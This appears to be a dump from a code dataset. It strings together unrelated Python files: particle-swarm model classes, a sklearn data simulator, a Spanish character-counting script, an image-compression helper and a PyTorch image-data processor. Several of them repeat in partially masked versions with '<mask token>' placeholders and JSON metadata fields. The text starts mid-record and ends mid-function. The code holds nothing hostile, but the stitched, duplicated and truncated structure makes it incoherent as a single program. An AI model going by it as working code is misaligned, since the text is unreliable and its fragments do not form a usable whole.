parser.add_argument('-i', '--inference_only', action='store_true', help\n ='Inference only or not')\n parser.add_argument('-r', '--root_dir', default='archive', type=str,\n help='Directory containing the downloaded data')\n parser.add_argument('-v', '--verbosity', default=0, type=int, choices=[\n 0, 1, 2], help='Verbosity level')\n return parser.parse_args()\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#===============================================================================
# @author: Daniel V. Stankevich
# @organization: RMIT, School of Computer Science, 2012
#
#
# This package contains representations of the following models:
# 'Particle' - an atomic element
# 'Swarm' - a set of particles
# 'Neighbourhood' - particles topology
# 'KnapsackSolution' - representation for solution of the problem
# 'TSPSolution' - representation for solution of the problem
#===============================================================================
#===============================================================================
# GENERIC MODELS
#===============================================================================
#---- Particle representation
class ParticleModel:
_position = None
_velocity = None
_bestPosition = None
_nbBestPosition = None
_fitness = -1
def __init__(self):
self._position = None
self._velocity = None
self._bestPosition = None
self._nbBestPosition = None
self._fitness = -1
#---- Swarm representation
class SwarmModel:
_particles = None
_neighbourhoods = None
_bestPosition = None
_bestPositionFitness = -1
def __init__(self):
self._particles = []
self._neighbourhoods = None
self._bestPosition = None
self._bestPositionFitness = -1
#---- Neighbourhood representation
class NeighbourhoodModel:
_particles = []
_bestPosition = None
_bestPositionFitness = -1
def __init__(self, particles):
self._particles = particles
self._bestPosition = None
self._bestPositionFitness = -1
#===============================================================================
# PROBLEM SPECIFIC MODELS
#===============================================================================
#---- Knapsack Problem Solution representation
class KnapsackSolutionModel:
_items = []
_knapsackSize = None
def __init__(self, items, size):
self._items = items
self._knapsackSize = size
#---- TSP Problem Solution representation
class TSPSolutionModel:
_edges = {}
_startNode = None
_numOfCities = None
_bestPath = []
def __init__(self, edges, numOfCities, startNode):
self._edges = edges
self._numOfCities = numOfCities
self._startNode = startNode
|
normal
|
{
"blob_id": "5c06229f8e80a7225620f25941cc5276a9021e53",
"index": 5353,
"step-1": "<mask token>\n\n\nclass SwarmModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-2": "<mask token>\n\n\nclass SwarmModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-3": "<mask token>\n\n\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-4": "class ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = -1\n\n def __init__(self):\n self._position = None\n self._velocity = None\n self._bestPosition = None\n self._nbBestPosition = None\n self._fitness = -1\n\n\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n\n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\nclass KnapsackSolutionModel:\n _items = []\n _knapsackSize = None\n\n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n\n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode\n",
"step-5": "#===============================================================================\n# @author: Daniel V. Stankevich\n# @organization: RMIT, School of Computer Science, 2012\n#\n#\n# This package contains representations of the following models:\n# 'Particle' - an atomic element\n# 'Swarm' - a set of particles\n# 'Neighbourhood' - particles topology\n# 'KnapsackSolution' - representation for solution of the problem\n# 'TSPSolution' - representation for solution of the problem\n#===============================================================================\n\n\n\n#===============================================================================\n# GENERIC MODELS\n#===============================================================================\n\n#---- Particle representation\nclass ParticleModel:\n _position = None\n _velocity = None\n _bestPosition = None\n _nbBestPosition = None\n _fitness = -1\n\n def __init__(self):\n self._position = None\n self._velocity = None\n self._bestPosition = None\n self._nbBestPosition = None\n self._fitness = -1\n\n#---- Swarm representation\nclass SwarmModel:\n _particles = None\n _neighbourhoods = None\n _bestPosition = None\n _bestPositionFitness = -1\n \n def __init__(self):\n self._particles = []\n self._neighbourhoods = None\n self._bestPosition = None\n self._bestPositionFitness = -1\n \n\n#---- Neighbourhood representation \nclass NeighbourhoodModel:\n _particles = []\n _bestPosition = None\n _bestPositionFitness = -1\n \n def __init__(self, particles):\n self._particles = particles\n self._bestPosition = None\n self._bestPositionFitness = -1\n\n\n#===============================================================================\n# PROBLEM SPECIFIC MODELS\n#===============================================================================\n\n#---- Knapsack Problem Solution representation \nclass KnapsackSolutionModel:\n _items = [] \n _knapsackSize = None\n \n def __init__(self, items, size):\n self._items = items\n self._knapsackSize = size\n\n#---- TSP Problem Solution representation\nclass TSPSolutionModel:\n _edges = {}\n _startNode = None\n _numOfCities = None\n _bestPath = []\n \n def __init__(self, edges, numOfCities, startNode):\n self._edges = edges\n self._numOfCities = numOfCities\n self._startNode = startNode",
"step-ids": [
10,
11,
12,
15,
16
]
}
|
[
10,
11,
12,
15,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sim_data():
n_samples = random.randint(500, 5000)
n_features = random.randint(5, 25)
n_informative = random.randint(5, n_features)
noise = random.uniform(0.5, 2)
X, y = make_regression(n_samples=n_samples, n_features=n_features,
n_informative=n_informative, noise=noise)
X_train, X_test, y_train, y_test = train_test_split(X, y)
params = {'n_samples': n_samples, 'n_features': n_features,
'n_informative': n_informative, 'noise': noise}
return X_train, y_train, X_test, y_test, params
<|reserved_special_token_1|>
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
import random
def sim_data():
n_samples = random.randint(500, 5000)
n_features = random.randint(5, 25)
n_informative = random.randint(5, n_features)
noise = random.uniform(0.5, 2)
X, y = make_regression(n_samples=n_samples, n_features=n_features,
n_informative=n_informative, noise=noise)
X_train, X_test, y_train, y_test = train_test_split(X, y)
params = {'n_samples': n_samples, 'n_features': n_features,
'n_informative': n_informative, 'noise': noise}
return X_train, y_train, X_test, y_test, params
<|reserved_special_token_1|>
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
import random
def sim_data():
# Parameters
n_samples = random.randint(500, 5000)
n_features = random.randint(5, 25)
n_informative = random.randint(5, n_features)
noise = random.uniform(0.5, 2)
# Simulate data
X, y = make_regression(n_samples=n_samples,
n_features=n_features,
n_informative=n_informative,
noise=noise)
# Train test split
X_train, X_test, y_train, y_test = train_test_split(X, y)
# Param dict
params = {"n_samples": n_samples,
"n_features": n_features,
"n_informative": n_informative,
"noise": noise}
# Return
return X_train, y_train, X_test, y_test, params
|
flexible
|
{
"blob_id": "c4aa5869d5f916f13aa924c19dc9792337619b31",
"index": 4011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef sim_data():\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n X, y = make_regression(n_samples=n_samples, n_features=n_features,\n n_informative=n_informative, noise=noise)\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n params = {'n_samples': n_samples, 'n_features': n_features,\n 'n_informative': n_informative, 'noise': noise}\n return X_train, y_train, X_test, y_test, params\n",
"step-3": "from sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nimport random\n\n\ndef sim_data():\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n X, y = make_regression(n_samples=n_samples, n_features=n_features,\n n_informative=n_informative, noise=noise)\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n params = {'n_samples': n_samples, 'n_features': n_features,\n 'n_informative': n_informative, 'noise': noise}\n return X_train, y_train, X_test, y_test, params\n",
"step-4": "from sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nimport random\n\ndef sim_data():\n\n # Parameters\n n_samples = random.randint(500, 5000)\n n_features = random.randint(5, 25)\n n_informative = random.randint(5, n_features)\n noise = random.uniform(0.5, 2)\n\n # Simulate data\n X, y = make_regression(n_samples=n_samples,\n n_features=n_features,\n n_informative=n_informative,\n noise=noise)\n\n # Train test split\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n\n # Param dict\n params = {\"n_samples\": n_samples,\n \"n_features\": n_features,\n \"n_informative\": n_informative,\n \"noise\": noise}\n\n # Return\n return X_train, y_train, X_test, y_test, params\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
Pide una cadena y un carácter por teclado y muestra cuantas veces aparece el carácter en la cadena.
Autor: David Galván Fontalba
Fecha: 27/10/2019
Algoritmo:
Pido un cadena
Pido un caracter
contador en 0
Hago una variable que empieza siendo 0, i
mientras i <= len(cadena)
si cadena[i] == caracter
contador +1
si no
i +1
fin
"""
print("Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.")
print("----------------------------------------------------------------------------------------------------------------------------------\n")
ourString = input("Escribe lo que quieras: ")
ourChar = input("Escribe un solo carácter: ")
counter = 0
i = 0
while i < len(ourString) :
if ourString[i] == ourChar :
counter += 1
i += 1
print(f"\nEl carácter {ourChar} aparece {counter} veces.")
|
normal
|
{
"blob_id": "65301be73bb56147609a103a932266013c3c0bd6",
"index": 1148,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(\n 'Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.'\n )\nprint(\n \"\"\"----------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n )\n<mask token>\nwhile i < len(ourString):\n if ourString[i] == ourChar:\n counter += 1\n i += 1\nprint(f\"\"\"\nEl carácter {ourChar} aparece {counter} veces.\"\"\")\n",
"step-3": "<mask token>\nprint(\n 'Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.'\n )\nprint(\n \"\"\"----------------------------------------------------------------------------------------------------------------------------------\n\"\"\"\n )\nourString = input('Escribe lo que quieras: ')\nourChar = input('Escribe un solo carácter: ')\ncounter = 0\ni = 0\nwhile i < len(ourString):\n if ourString[i] == ourChar:\n counter += 1\n i += 1\nprint(f\"\"\"\nEl carácter {ourChar} aparece {counter} veces.\"\"\")\n",
"step-4": "\"\"\"\r\nPide una cadena y un carácter por teclado y muestra cuantas veces aparece el carácter en la cadena.\r\n\r\nAutor: David Galván Fontalba\r\nFecha: 27/10/2019\r\n\r\nAlgoritmo:\r\nPido un cadena\r\nPido un caracter\r\ncontador en 0\r\nHago una variable que empieza siendo 0, i\r\nmientras i <= len(cadena)\r\n si cadena[i] == caracter\r\n contador +1\r\n si no\r\n i +1\r\nfin\r\n\"\"\"\r\nprint(\"Bienvenido a este programa para que introduzcas una frase y un carácter, y decirte cuántas veces aparece ese carácter en tu frase.\")\r\nprint(\"----------------------------------------------------------------------------------------------------------------------------------\\n\")\r\n\r\nourString = input(\"Escribe lo que quieras: \")\r\nourChar = input(\"Escribe un solo carácter: \")\r\n\r\ncounter = 0\r\ni = 0\r\nwhile i < len(ourString) :\r\n if ourString[i] == ourChar :\r\n counter += 1\r\n i += 1\r\nprint(f\"\\nEl carácter {ourChar} aparece {counter} veces.\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
""" Image Check / Compress Image"""
import re
import os
from PIL import Image
from common.constant import PATH
def check_image(file_type):
match = re.match("image/*", file_type)
return match
def compress_image(data):
with open(PATH.format(data['name']), 'wb+') as file:
file.write(data['binary'])
image = Image.open(PATH.format(data['name']))
new_img = image.resize((128, 128))
new_img.save(PATH.format(data['name']))
with open(PATH.format(data['name']), 'rb') as image_file:
image = image_file.read()
os.remove(PATH.format(data['name']))
return image
|
normal
|
{
"blob_id": "13fa650557a4a8827c9fb2e514bed178df19a32c",
"index": 1295,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-4": "<mask token>\nimport re\nimport os\nfrom PIL import Image\nfrom common.constant import PATH\n\n\ndef check_image(file_type):\n match = re.match('image/*', file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-5": "\"\"\" Image Check / Compress Image\"\"\"\n\nimport re\nimport os\nfrom PIL import Image\n\nfrom common.constant import PATH\n\n\ndef check_image(file_type):\n match = re.match(\"image/*\", file_type)\n return match\n\n\ndef compress_image(data):\n with open(PATH.format(data['name']), 'wb+') as file:\n file.write(data['binary'])\n image = Image.open(PATH.format(data['name']))\n new_img = image.resize((128, 128))\n new_img.save(PATH.format(data['name']))\n\n with open(PATH.format(data['name']), 'rb') as image_file:\n image = image_file.read()\n os.remove(PATH.format(data['name']))\n return image\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from dai_imports import*
from obj_utils import*
import utils
class my_image_csv_dataset(Dataset):
def __init__(self, data_dir, data, transforms_ = None, obj = False,
minorities = None, diffs = None, bal_tfms = None):
self.data_dir = data_dir
self.data = data
self.transforms_ = transforms_
self.tfms = None
self.obj = obj
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
assert transforms_ is not None, print('Please pass some transforms.')
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path = os.path.join(self.data_dir,self.data.iloc[index, 0])
img = Image.open(img_path)
img = img.convert('RGB')
img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3)
y = self.data.iloc[index, 1]
if self.minorities and self.bal_tfms:
if y in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[y]
l = [self.bal_tfms]
l.extend(self.transforms_)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[y]
self.transforms_[1:1] = self.bal_tfms
self.tfms = transforms.Compose(self.transforms_)
# print(self.tfms)
else:
self.tfms = transforms.Compose(self.transforms_)
else:
self.tfms = transforms.Compose(self.transforms_)
x = self.tfms(img)
if self.obj:
s = x.size()[1]
if isinstance(s,tuple):
s = s[0]
row_scale = s/img.size[0]
col_scale = s/img.size[1]
y = rescale_bbox(y,row_scale,col_scale)
y.squeeze_()
y2 = self.data.iloc[index, 2]
y = (y,y2)
return (x,y)
class my_image_folder(DatasetFolder):
def __init__(self, root, transform=None, target_transform=None,
loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None):
super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,
transform=transform,
target_transform=target_transform)
self.imgs = self.samples
self.minorities = minorities
self.diffs = diffs
self.bal_tfms = bal_tfms
self.tta_tfms = tta_tfms
self.tfms = None
def __getitem__(self,index):
path, target = self.samples[index]
sample = self.loader(path)
if self.transform:
if self.minorities and self.bal_tfms:
if target in self.minorities:
if hasattr(self.bal_tfms,'transforms'):
for tr in self.bal_tfms.transforms:
tr.p = self.diffs[target]
l = [self.bal_tfms]
l.extend(self.transform)
self.tfms = transforms.Compose(l)
else:
for t in self.bal_tfms:
t.p = self.diffs[target]
self.tfms = transforms.Compose(self.bal_tfms + self.transform )
else:
self.tfms = transforms.Compose(self.transform)
elif self.tta_tfms:
self.tfms = self.tta_tfms
else:
self.tfms = transforms.Compose(self.transform)
sample = self.tfms(sample)
if self.target_transform:
target = self.target_transform(target)
return sample, target
def extract_data(dt):
x = []
y = []
for a,b in dt:
x.append(a)
y.append(b)
return x,y
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def get_minorities(df,thresh=0.8):
c = df.iloc[:,1].value_counts()
lc = list(c)
max_count = lc[0]
diffs = [1-(x/max_count) for x in lc]
diffs = dict((k,v) for k,v in zip(c.keys(),diffs))
minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)]
return minorities,diffs
def csv_from_path(path, img_dest):
path = Path(path)
img_dest = Path(img_dest)
labels_paths = list(path.iterdir())
tr_images = []
tr_labels = []
for l in labels_paths:
if l.is_dir():
for i in list(l.iterdir()):
if i.suffix in IMG_EXTENSIONS:
name = i.name
label = l.name
new_name = '{}_{}'.format(path.name,name)
new_path = img_dest/new_name
# print(new_path)
os.rename(i,new_path)
tr_images.append(new_name)
tr_labels.append(label)
# os.rmdir(l)
tr_img_label = {'Img':tr_images, 'Label': tr_labels}
csv = pd.DataFrame(tr_img_label,columns=['Img','Label'])
csv = csv.sample(frac=1).reset_index(drop=True)
return csv
def add_extension(a,e):
a = [x+e for x in a]
return a
def one_hot(targets, multi = False):
if multi:
binerizer = MultiLabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
else:
binerizer = LabelBinarizer()
dai_1hot = binerizer.fit_transform(targets)
return dai_1hot,binerizer.classes_
def get_index(arr,a):
for i in range(len(arr)):
if sum(arr[i] == a) == len(a):
return i
return False
def rescale_bbox(bb,row_scale,col_scale):
bb = bb.reshape((-1,4))
for b in bb:
r1,c1,r2,c2 = b
b[0] = int(np.round(r1*col_scale))
b[1] = int(np.round(c1*row_scale))
b[2] = int(np.round(r2*col_scale))
b[3] = int(np.round(c2*row_scale))
# bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)])
# for b in bb:
# r1,c1,r2,c2 = b
# b[0] = int(np.round(r1*row_scale))
# b[1] = int(np.round(c1*col_scale))
# b[2] = int(np.round(r2*row_scale))
# b[3] = int(np.round(c2*col_scale))
# if(sum(b)) == 1:
# b[0],b[1],b[2],b[3] = 0,0,0,0
bb = bb.reshape((1,-1))
return bb
def get_img_stats(dataset,sz):
size = int(len(dataset)*sz)
i = 0
imgs = []
for img,_ in dataset:
# print(img.size())
if i > size:
break
imgs.append(img)
i+=1
imgs_ = torch.stack(imgs,dim=3)
imgs_ = imgs_.view(3,-1)
imgs_mean = imgs_.mean(dim=1)
imgs_std = imgs_.std(dim=1)
return imgs_mean,imgs_std
def split_df(train_df,test_size = 0.15):
try:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1])
except:
train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2)
train_df = train_df.reset_index(drop = True)
val_df = val_df.reset_index(drop = True)
return train_df,val_df
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class DataProcessor:
def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False,
tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True):
print('+------------------------------------+')
print('| Dream AI |')
print('+------------------------------------+')
print()
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv,
val_csv,reg,tr_name,val_name,test_name,extension)
self.obj = False
self.multi_label = False
if setup_data:
self.set_up_data()
def set_up_data(self,split_size = 0.15):
data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name)
# check if paths given and also set paths
if not data_path:
data_path = os.getcwd() + '/'
tr_path = os.path.join(data_path,tr_name)
val_path = os.path.join(data_path,val_name)
test_path = os.path.join(data_path,test_name)
if os.path.exists(os.path.join(data_path,tr_name+'.csv')):
train_csv = tr_name+'.csv'
# if os.path.exists(os.path.join(data_path,val_name+'.csv')):
# val_csv = val_name+'.csv'
# if os.path.exists(os.path.join(data_path,test_name+'.csv')):
# test_csv = test_name+'.csv'
# paths to csv
if not train_csv:
print('no')
train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path)
train_csv_path = os.path.join(data_path,train_csv)
train_df = pd.read_csv(train_csv_path)
if 'Unnamed: 0' in train_df.columns:
train_df = train_df.drop('Unnamed: 0', 1)
if len(train_df.columns) > 2:
self.obj = True
img_names = [str(x) for x in list(train_df.iloc[:,0])]
if self.extension:
img_names = add_extension(img_names,self.extension)
if val_csv:
val_csv_path = os.path.join(data_path,val_csv)
val_df = pd.read_csv(val_csv_path)
val_targets = list(map(str,list(val_df.iloc[:,1])))
if test_csv:
test_csv_path = os.path.join(data_path,test_csv)
test_df = pd.read_csv(test_csv_path)
test_targets = list(map(str,list(test_df.iloc[:,1])))
targets = list(map(str,list(train_df.iloc[:,1])))
lengths = [len(t) for t in [s.split() for s in targets]]
self.target_lengths = lengths
split_targets = [t.split() for t in targets]
if self.obj:
print('\nObject Detection\n')
# bounding boxes
int_targets = [list(map(float,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
# one-hot classes
obj_targets = list(map(str,list(train_df.iloc[:,2])))
obj_split_targets = [t.split() for t in obj_targets]
try:
obj_split_targets = [list(map(int,x)) for x in obj_split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(obj_split_targets,True)
# train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
# class indexes
c_names = list(onehot_classes)
class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets]
zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int)
# print(zero_idx.shape)
for i,t in enumerate(zero_idx):
# temp_l = len(class_idx[i])
# if temp_l > 90:
# print(i,temp_l)
t[len(t)-len(class_idx[i]):] = class_idx[i]
zero_idx[i] = t
train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
# self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)])
elif self.reg:
print('\nRegression\n')
int_targets = [list(map(int,x)) for x in split_targets]
zero_targets = np.zeros((len(targets),max(lengths)),dtype=int)
for i,t in enumerate(zero_targets):
t[len(t)-len(int_targets[i]):] = int_targets[i]
zero_targets[i] = t
train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets]
self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1)
elif lengths[1:] != lengths[:-1]:
self.multi_label = True
print('\nMulti-label Classification\n')
try:
split_targets = [list(map(int,x)) for x in split_targets]
except:
pass
dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label)
train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot]
self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes
else:
print('\nSingle-label Classification\n')
unique_targets = list(np.unique(targets))
target_ids = [unique_targets.index(x) for x in targets]
train_df.iloc[:,1] = target_ids
if val_csv:
target_ids = [unique_targets.index(x) for x in val_targets]
val_df.iloc[:,1] = target_ids
if test_csv:
target_ids = [unique_targets.index(x) for x in test_targets]
test_df.iloc[:,1] = target_ids
self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets
# self.models_path = os.path.join(self.data_dir, 'models')
# os.makedirs(self.models_path,exist_ok=True)
if not val_csv:
train_df,val_df = split_df(train_df,split_size)
if not test_csv:
val_df,test_df = split_df(val_df,split_size)
tr_images = [str(x) for x in list(train_df.iloc[:,0])]
val_images = [str(x) for x in list(val_df.iloc[:,0])]
test_images = [str(x) for x in list(test_df.iloc[:,0])]
if self.extension:
tr_images = add_extension(tr_images,self.extension)
val_images = add_extension(val_images,self.extension)
test_images = add_extension(test_images,self.extension)
train_df.iloc[:,0] = tr_images
val_df.iloc[:,0] = val_images
test_df.iloc[:,0] = test_images
train_df.to_csv(os.path.join(data_path,'train.csv'),index=False)
val_df.to_csv(os.path.join(data_path,'val.csv'),index=False)
test_df.to_csv(os.path.join(data_path,'test.csv'),index=False)
self.minorities,self.class_diffs = None,None
if (not self.obj) or (not self.multi_label):
self.minorities,self.class_diffs = get_minorities(train_df)
self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df}
data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names,
'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label}
# save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl'))
self.data_dict = data_dict
return data_dict
def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None):
train_df = csv_from_path(tr_path,tr_path)
train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',None)
if val_path is not None:
val_exists = os.path.exists(val_path)
if val_exists:
val_df = csv_from_path(val_path,tr_path)
val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv')
if test_path is not None:
test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path,tr_path)
test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv')
return ret
def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,
bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],
data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.val_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.test_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
])}
# tta_tfms = {self.tr_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]),
# self.val_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]) }
else:
